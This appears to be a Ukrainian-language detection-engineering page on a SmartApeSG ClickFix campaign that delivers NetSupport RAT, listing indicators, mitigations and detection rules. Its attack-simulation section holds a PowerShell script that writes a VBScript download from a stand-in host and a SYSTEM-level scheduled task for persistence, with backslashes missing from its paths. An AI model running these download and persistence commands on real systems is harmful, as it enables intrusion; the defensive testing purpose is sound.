NetSupport RAT доставляється за допомогою невідомого завантажувача
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Раніше невідомий засіб віддаленого доступу був помічений під час доставки небезпечного пакету NetSupport Manager RAT. Початковий шкідливий ПЗ спілкувався з сервером командування та контролю на 89.110.110.119 через TCP порт 443 використовуючи закодований трафік. Кампанія, відстежена як SmartApeSG ClickFix, залежала від шкідливих скриптів та архіву CAB для встановлення NetSupport RAT на системи жертв.
Розслідування
Розслідування виявило кілька індикаторів, включаючи шкідливі URL-адреси, IP-адреси та файли, записані у ProgramData директорію. Початковий RAT доставив пакетний скрипт, який вилучив і встановив NetSupport RAT з архіву setup.cab . Після завершення встановлення допоміжні файли були видалені, щоб зменшити видимі сліди активності.
Пом’якшення
Організації повинні блокувати мережевий трафік на виявлені небезпечні IP-адреси та домени та моніторити створення згаданих файлів у ProgramData. Захисні засоби кінцевих точок повинні виявляти виконання підозрілих VBScript та пакетних файлів, у той час як мережевий моніторинг повинен застосовувати суворіший контроль до закодованого трафіку через порт 443.
Реагування
Захисники повинні сигналізувати про перераховані індикатори, ізолювати уражені системи та проводити судово-медичний аналіз, щоб виявити будь-які механізми збереження. Шкідливі файли слід видалити, будь-які несанкціоновані зміни слід скасувати, а політику брандмауера потрібно оновити для блокування вихідного зв’язку з виявленою інфраструктурою командування та контролю.
Потік атаки
Виявлення
LOLBAS WScript / CScript (через process_creation)
Переглянути
Можливе виконання двійкового файлу NetSupport Manager із підозрілого каталогу (через process_creation)
Переглянути
Підозріле командувальне управління через незвичайний домен верхнього рівня (TLD) DNS запит (через dns)
Переглянути
IOC (HashSha256) для виявлення: Невизначений RAT поширює NetSupport RAT
Переглянути
IOC (SourceIP) для виявлення: Невизначений RAT поширює NetSupport RAT
Переглянути
IOC (DestinationIP) для виявлення: Невизначений RAT поширює NetSupport RAT
Переглянути
Виявлення інфекції NetSupport RAT через скрипт і файли CAB [Подія файлу Windows]
Переглянути
Виявлення початкового та NetSupport RAT C2 зв’язку [Мережеве з’єднання Windows]
Переглянути
Виконання симуляції
Передумова: Телеметрія та попередня перевірка базової лінії повинні бути успішно пройдені.
Обґрунтування: Цей розділ детально описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та наратив повинні безпосередньо відображати ідентифіковані TTP та прагнути створити точну телеметрію, яку очікує логіка виявлення.
-
Опис атаки та команди:
Атакуючий, який отримав початковий доступ до хоста Windows, скидає три шкідливі артефакти доC:ProgramData:processor.vbs– сценарій Visual Basic, який завантажує головний двійковий файл RAT.token.bat– пакетний файл, який створює завдання, що планується для збереження.setup.cab– архів CAB, який містить DLL, що завантажується вC:ProgramDataі пізніше завантажується черезrundll32.exe.
Потім атакуючий виконує кожний файл по черзі, що викликає події створення процесу, які містять точні шляхи файлів, необхідні для правила Sigma.
-
Сценарій регресійного тестування:
# netSupport_RAT_simulation.ps1 # ------------------------------------------------- # ПРИЗНАЧЕННЯ: Відтворення телеметрії інфекції NetSupport RAT # ------------------------------------------------- $targetDir = "C:ProgramData" # Переконайтесь, що каталог існує if (-Not (Test-Path $targetDir)) { New-Item -ItemType Directory -Path $targetDir -Force } # 1. Скидання processor.vbs $vbsPath = Join-Path $targetDir "processor.vbs" Set-Content -Path $vbsPath -Value @" Set objXML = CreateObject("MSXML2.XMLHTTP") objXML.open "GET","http://malicious.example.com/payload.exe",False objXML.send "@" # 2. Скидання token.bat $batPath = Join-Path $targetDir "token.bat" Set-Content -Path $batPath -Value @" schtasks /create /tn "NetSupportPersist" /tr "$targetDirsetup.cab" /sc onlogon /ru System "@ # 3. Скидання setup.cab (підроблений CAB, що містить текстовий файл) $cabPath = Join-Path $targetDir "setup.cab" $tempDir = "$env:TEMPcab_temp" New-Item -ItemType Directory -Path $tempDir -Force | Out-Null Set-Content -Path "$tempDirdummy.txt" -Value "заповнювач" # Створення CAB – вимагає makecab (вбудований інструмент Windows) & makecab.exe "$tempDirdummy.txt" $cabPath # Фаза виконання – запуск виявлень Write-Host "`n[+] Виконується processor.vbs" cscript.exe //B //Nologo $vbsPath Write-Host "[+] Виконується token.bat" cmd.exe /c $batPath Write-Host "[+] Виконується setup.cab через rundll32 (симульоване завантаження)" rundll32.exe "$cabPath",DummyEntryPoint # Очищення тимчасової папки, використаної для створення CAB Remove-Item -Recurse -Force $tempDir -
Команди очищення:
# netSupport_RAT_cleanup.ps1 $targetDir = "C:ProgramData" $files = @("processor.vbs","token.bat","setup.cab") foreach ($f in $files) { $fullPath = Join-Path $targetDir $f if (Test-Path $fullPath) { Remove-Item -Force $fullPath } } # Видалити створене token.bat завдання schtasks /delete /tn "NetSupportPersist" /f Write-Host "Очистка завершена."